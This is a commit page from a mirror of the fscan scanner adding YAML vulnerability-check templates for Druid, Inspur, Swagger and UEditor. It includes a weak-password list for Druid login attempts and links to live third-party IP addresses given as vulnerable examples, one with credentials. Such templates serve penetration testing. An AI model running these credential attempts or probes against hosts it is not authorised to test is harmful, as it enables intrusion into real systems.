mirrors/fscan
1
0
Fork 0
mirror of https://github.com/shadow1ng/fscan.git synced 2025-07-13 21:02:44 +08:00
Code Issues Actions Packages Projects Releases Wiki Activity

init: sync poc

Browse Source
This commit is contained in:
newcodor 2025-06-11 00:17:15 +08:00
parent 9ee51a96d8
commit f25afe6e97
5 changed files with 85 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
WebScan/pocs/druid-monitor-unauth.yml
View File

@ -1,10 +1,11 @@
name: poc-yaml-druid-monitor-unauth name: poc-yaml-druid-monitor-unauth
rules: rules:
- method: GET - method: GET
path: /druid/index.html path: /druid/index.html
expression: | expression: |
response.status == 200 && response.body.bcontains(b"Druid Stat Index") && response.body.bcontains(b"DruidVersion") && response.body.bcontains(b"DruidDrivers") response.status == 200 && response.body.bcontains(b"Druid Stat Index") && response.body.bcontains(b"DruidVersion") && response.body.bcontains(b"DruidDrivers")
detail: detail:
author: met7or author: met7or
links: links:
- https://github.com/alibaba/druid - https://github.com/alibaba/druid
- http://43.130.61.224:8088/druid/index.html

34
WebScan/pocs/druid-monitor-weakpass.yml Normal file
View File

@ -0,0 +1,34 @@
name: poc-yaml-druid-monitor-weakpass
sets:
weakpass:
- loginUsername=admin&loginPassword=admin
- loginUsername=ry&loginPassword=123456
- loginUsername=admin&loginPassword=123456
- loginUsername=ruoyi&loginPassword=admin123
- loginUsername=dy&loginPassword=123456
- loginUsername=ruoyi&loginPassword=123456
- loginUsername=dy&loginPassword=admin123
- loginUsername=druid&loginPassword=druid
- loginUsername=admin&loginPassword=admin123
uri:
- /
- /api/
- /admin/
- /admin-api/
- /prod-api/
- /jeecg-boot/
- /dev-api/
- /system/
- /webpage/system/
rules:
- method: POST
# path: /druid/datasource.json
path: "{{uri}}druid/datasource.json"
body: "{{weakpass}}"
expression: |
response.status == 200 && response.body.bcontains(b"FilterClassNames") && response.body.bcontains(b"com.alibaba.druid")
detail:
author: rootmog
links:
- https://github.com/alibaba/druid
- http://39.108.94.156:8086/druid/index.html(admin/123456)\

12
WebScan/pocs/inspur-cwbase.yml Normal file
View File

@ -0,0 +1,12 @@
name: poc-yaml-inspur-cwbase
rules:
- method: GET
path: /cwbase/
follow_redirects: true
expression: |
response.body.bcontains(bytes("weblogin/index.aspx"))
detail:
author: liuy
info: inspur-cwbase
links:
- https://blog.csdn.net/zzxx191z/article/details/140689290

11
WebScan/pocs/swagger-ui-unauth.yml
View File

@ -10,6 +10,13 @@ sets:
- actuator/swagger-ui.html - actuator/swagger-ui.html
- libs/swagger-ui.html - libs/swagger-ui.html
- template/swagger-ui.html - template/swagger-ui.html
- v2/api-docs
- v3/api-docs
- prod-api/v2/api-docs
- prod-api/v3/api-docs
- swagger/docs/v1
- swagger-resources
- prod-api/swagger-resources
- api_docs - api_docs
- api/docs/ - api/docs/
- api/index.html - api/index.html
@ -23,8 +30,10 @@ rules:
- method: GET - method: GET
path: /{{path}} path: /{{path}}
expression: | expression: |
response.status == 200 && (response.body.bcontains(b"Swagger UI") || response.body.bcontains(b"swagger-ui.min.js")|| response.body.bcontains(b'swagger:') || response.body.bcontains(b'swagger:') || response.body.bcontains(b'Swagger 2.0') || response.body.bcontains(b"\"swagger\":") ) response.status == 200 && (response.body.bcontains(b"Swagger UI") || response.body.bcontains(b"swagger-ui.min.js")|| response.body.bcontains(b'swagger:') || response.body.bcontains(b'swagger:') || response.body.bcontains(b'Swagger 2.0') || response.body.bcontains(b"\"openapi\":") || response.body.bcontains(b"\"swagger\":") || response.body.bcontains(b"\"swaggerVersion\":"))
detail: detail:
author: AgeloVito author: AgeloVito
links: links:
- https://blog.csdn.net/u012206617/article/details/109107210 - https://blog.csdn.net/u012206617/article/details/109107210
- https://aqsys.tapig.com/stage-api/swagger-resources
- http://39.98.195.144:8043/swagger/ui/index(http://39.98.195.144:8043/swagger/docs/v1)

28
WebScan/pocs/ueditor-cnvd-2017-20077-file-upload.yml
View File

@ -1,7 +1,32 @@
name: poc-yaml-ueditor-cnvd-2017-20077-file-upload name: poc-yaml-ueditor-cnvd-2017-20077-file-upload
sets:
uri:
- /
- /content/
- /Content/plugins/
- /Content/js/
- /Utility/
- /js/
- /plugins/
- /scripts/
- /Scripts/
- /WebComm/CommScripts/
- /static/
edit:
- ueditor
- Ueditor
- editor
- ueditor1_4_3_3
- ueditor1_4_3_3-utf8-net/utf8-net
net:
- /net/
- /
controller:
- controller.ashx?
- "?"
rules: rules:
- method: GET - method: GET
path: /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 path: "{{uri}}{{edit}}{{net}}{{controller}}ccc=test&action=catchimage&encode=utf-8"
headers: headers:
Accept-Encoding: 'deflate' Accept-Encoding: 'deflate'
follow_redirects: false follow_redirects: false
@ -13,5 +38,6 @@ detail:
links: links:
- https://zhuanlan.zhihu.com/p/85265552 - https://zhuanlan.zhihu.com/p/85265552
- https://www.freebuf.com/vuls/181814.html - https://www.freebuf.com/vuls/181814.html
- http://123.57.69.82:20000/Utility/UEditor/net?action=catchimage
exploit: >- exploit: >-
http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8 http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8